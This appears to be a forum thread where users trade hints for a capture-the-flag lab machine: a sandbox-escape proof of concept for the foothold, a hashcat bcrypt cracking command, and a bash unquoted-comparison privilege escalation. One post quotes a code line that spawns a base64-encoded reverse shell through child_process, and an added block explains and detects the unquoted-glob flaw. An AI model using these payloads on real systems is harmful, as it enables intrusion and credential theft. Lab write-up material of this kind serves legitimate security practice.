Posts: 12
Threads: 0
Joined: Nov 2023
(Nov 05, 2023, 07:17 AM)xts Wrote: i got mysql password but how i use it for root?
(Nov 05, 2023, 04:10 PM)intersteller2038 Wrote: Where did you find the pass?
(Nov 05, 2023, 04:20 PM)0BL1V10N Wrote: You can bruteforce the password, just use the script that user rwwwshell posted above
(Nov 05, 2023, 04:56 PM)intersteller2038 Wrote: Got it, but is there any other way of solving the machine?
(Nov 05, 2023, 06:53 PM)0BL1V10N Wrote: Yes, you can run the sudo command and then pspy and you will find something interesting
Ye, I had done that. The user can run a .sh file as root and that file is also running as a cronjob. My question was: is there a way to root the machine without using a script? That .sh file can't be edited/moved/removed so...
Posts: 13
Threads: 0
Joined: Oct 2023
For root: search for unquoted variable comparison, how it compares. Remember this: "You CAN'T escape the if statement." A single thing can exploit it. But remember to look through pspy.
It's an easy box. But root isn't easy, unless you find the solution. Then you'll laugh at yourself.
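The unquoted comparison these posts hint at, as an added example that is not part of the thread: inside bash [[ ]] an unquoted right-hand side of == is matched as a glob pattern, and quoting it restores a literal comparison. The function names, the sample script and the secret are all constructed for illustration, and the grep check is a review heuristic only.

```shell
#!/usr/bin/env bash
# Added example, not from the thread; every name and value is constructed.
[ -n "${BASH_VERSION:-}" ] || exec bash "$0" "$@"   # [[ ]] is a bash feature

# Flawed: inside [[ ]] an unquoted right-hand side of == is a glob PATTERN,
# so the caller-supplied value decides what counts as a match.
check_unquoted() {              # $1 = stored secret, $2 = supplied value
    local stored=$1 supplied=$2
    [[ $stored == $supplied ]]
}

# Hardened: quoting the right-hand side forces a literal string comparison.
check_quoted() {
    local stored=$1 supplied=$2
    [[ $stored == "$supplied" ]]
}

# Review aid: print the line numbers in script $1 where the right-hand side
# of =, == or != inside [[ ]] begins with an unquoted expansion.
# Heuristic only; ShellCheck reports this class as SC2053.
find_unquoted_rhs() {
    grep -nE '\[\[[^]]*[!=]?=[[:space:]]*\$[{A-Za-z_]' "$1" | cut -d: -f1
}

# Constructed script to audit: line 2 is flawed, line 3 is the fixed form.
write_sample() {
    cat > "$1" <<'EOF'
#!/bin/bash
if [[ $STORED == $INPUT ]]; then echo ok; fi
if [[ $STORED == "$INPUT" ]]; then echo ok; fi
if [[ $NAME =~ $REGEX ]]; then echo ok; fi
EOF
}

demo() {
    local secret='constructed-secret-123' f candidate u q
    for candidate in 'wrong-guess' 'constructed-*' '*'; do
        check_unquoted "$secret" "$candidate" && u=accept || u=reject
        check_quoted   "$secret" "$candidate" && q=accept || q=reject
        printf '%-16s unquoted=%s quoted=%s\n' "$candidate" "$u" "$q"
    done
    f=$(mktemp) && write_sample "$f"
    echo "flagged lines: $(find_unquoted_rhs "$f" | tr '\n' ' ')"
    rm -f "$f"
}
demo
```

Any root-run script that compares a secret against caller-controlled input should use the quoted form; running ShellCheck over such scripts catches the unquoted one before deployment.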
Posts: 25
Threads: 0
Joined: Oct 2023
What payload did you use in order to get the rev shell before escalating to user?
Posts: 50
Threads: 4
Joined: Sep 2023
(Nov 06, 2023, 08:40 PM)th3visitor Wrote: What payload did you use in order to get the rev shell before escalating to user?
Hey man! Don't know if you are still stuck, but this is what I used:
https://gist.github.com/leesh3288/381b23...90cc8bb244
I also got stuck because there are 2 or 3 CVEs that are almost the same. Good luck with the machine, and if you need help, send a message. Always glad to help!
Posts: 3
Threads: 0
Joined: Sep 2023
(Nov 04, 2023, 08:26 PM)chillywilly Wrote: after a little poking around i found a hash
(Nov 04, 2023, 08:32 PM)m1lk Wrote: how did you get hash
(Nov 04, 2023, 08:36 PM)blade33 Wrote: look at /var/www/contact/
(Nov 04, 2023, 08:38 PM)m1lk Wrote: thanksss
(Nov 04, 2023, 09:02 PM)hdddjik224636rggggq Wrote: If you are having trouble cracking it, it's bcrypt and the command for hashcat is hashcat -a 0 -m 3200 hashes.txt wordlist.txt -w 3
Used the same command. Hashcat is not decrypting, giving me some shit errors about hash length and separator. Any advice please?
Posts: 9
Threads: 0
Joined: Aug 2023
(Nov 04, 2023, 11:36 PM)ajasjas Wrote: Unescaped variable use in conditionals can be influenced to always validate true.
(Nov 04, 2023, 11:49 PM)nenandjabhata Wrote: I found this PoC, "https://gist.github.com/arkark/c1c57eaf3e0a649af1a70c2b93b17550", but I don't know how to use it. Can you help with the user foothold?
I used this POC https://gist.github.com/leesh3288/381b23...90cc8bb244 and modified this line:
c.constructor('return process')().mainModule.require('child_process').execSync('echo base64reverseshellgoeshere | base64 -d | bash');
If you get command can't run errors, then reset the machine. I think it gets flaky if too many child_processes are running. Banged my head against that until I said fuck it and reset the machine.
When in doubt reboot